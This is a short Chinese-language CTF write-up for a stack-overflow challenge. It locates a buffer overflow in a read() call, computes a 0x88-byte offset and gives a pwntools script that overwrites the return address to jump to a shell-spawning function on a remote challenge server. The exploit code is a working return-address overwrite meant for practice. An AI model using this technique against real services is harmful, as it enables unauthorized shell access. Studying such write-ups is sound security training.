主函数
其他函数中read中的buf存在栈溢出 此为入手点
通过查看函数可以看到下面的函数 调用system打开了一个shell
我们现在需要通过在输入buf时溢出加入call的地址来调用shell
callsystem地址
找buf的溢出点
buf起始地址
返回地址
距离是 : (+0x0000000000000008) - (-0x0000000000000080)
0x88
payload=‘a’*0x88+p64(callysytem地址)
exp
from pwn import *
p = remote("111.198.29.45","46432")
call_system = 0x400596
payload = 0x88*'a' + p64(call_system)
p.sendline(payload)
p.interactive()
因为是调shell本地运行不出flag只能在线运行